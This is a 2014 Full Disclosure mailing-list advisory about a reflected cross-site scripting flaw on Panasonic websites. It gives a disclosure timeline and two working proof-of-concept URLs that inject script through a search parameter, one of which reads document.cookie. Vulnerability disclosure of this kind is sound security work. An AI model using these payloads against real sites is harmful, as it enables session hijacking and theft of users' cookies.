[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] XSS on Panasonic site

To: <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] XSS on Panasonic site
From: "Roberto Garcia Amoriz" <roberto.garcia@xxxxxxxxxxxx>
Date: Fri, 20 Jun 2014 15:04:02 +0200

                                                                - XSS on
Panasonic site-

****************************************************************************
***************************************
Advisory: security.panasonic.com ? Cross-Site Script Vulnerability (XSS)
Advisory ID:  969061
Author: Roberto Garcia (@1gbDeInfo)
Affected Software: Successfully tested on  security.panasonic.com Vendor
URL: http://security.panasonic.com 
Vendor Status: reported 2 times but not solved
****************************************************************************
***************************************


**************************
Vulnerability Description
**************************

The website " security.panasonic.com " is prone to a XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user?s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.


**************************
PoC-Exploit
**************************

 
http://vftr.panasonic.co.jp/en/search.x?q=data%3Atext%2Fhtml%2C%3Cscript%3Ea
lert%280%29%3C%2Fscript%3E&x=0&y=0&ie=ISO-8859-1

 
http://vftr.panasonic.co.jp/en/search.x?q=data%3Atext%2Fhtml%2C%3Cscript%3Ea
lert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0&ie=utf8


**************************
Solution
**************************

  Reported 2 times but not solved

**************************
Disclosure Timeline
**************************

- Report vuln Jun 4, 2014 via email to samuel.garcia@xxxxxxxxxxxxxxxxxxxx

- Reported again via web Jun 12, 2014. They answer me:

        Dear Mr. Garcia, 
        Thank you for your prompt e-mail reply. 
        egarding your enquiry, I am writing to confirm having forwarded your
message to the corresponding department.
 
        Kind Regards, 
        Teo
        Customer Service Team 
        Panasonic UK

**************************
Afected sites:

  - vftr.panasonic.co.jp
  - security.panasonic.com
  - panasonic.ney

**************************


**************************
Credits
**************************

----------------------------------------------------------------------------
--------------
Vulnerability found and advisory written by Roberto Garcia (@1gbDeInfo)
----------------------------------------------------------------------------
--------------

Best regards.

Roberto Garcia Amoriz

Linkedin: es.linkedin.com/in/rogaramo/
Web:  http://www.1gbdeinformacion.com
Twitter: @1gbdeinfo




_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] XSS on Panasonic site
  - From: Adrien Jolibert

Prev by Date: [FD] Project un1c0rn hits 70k hosts
Next by Date: [FD] XSS on Epson site
Previous by thread: Re: [FD] Project un1c0rn hits 70k hosts
Next by thread: Re: [FD] XSS on Panasonic site
Index(es):
- Date
- Thread